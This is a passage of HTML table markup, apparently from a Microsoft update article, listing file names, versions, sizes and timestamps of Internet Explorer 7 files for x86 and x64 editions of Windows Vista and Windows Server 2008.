class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:26</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.18945</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:13</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23226</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:24</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">479,744</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">3,625,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:04</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:05</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,430,528</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,430,528</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">33,792</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:50</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">33,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,032,192</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,041,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">18-Jun-2009</td><td class=\"sbody-td\">06:57</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">15-Nov-2011</td><td class=\"sbody-td\">15:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">249,856</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">249,856</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">03-Apr-2009</td><td class=\"sbody-td\">21:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">15-Nov-2011</td><td class=\"sbody-td\">15:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.18945</td><td class=\"sbody-td\">485,376</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">22:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23226</td><td class=\"sbody-td\">485,888</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">763,392</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">763,392</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">5,731,328</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:36</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">5,736,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:48</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">377,856</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">176,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:55</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">377,856</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">176,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">146,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">146,944</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">7,051,776</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">224,768</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">7,053,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">224,768</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">21:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:49</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:21</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">19-Sep-2013</td><td class=\"sbody-td\">12:26</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.18945</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:13</td><td class=\"sbody-td\">Not 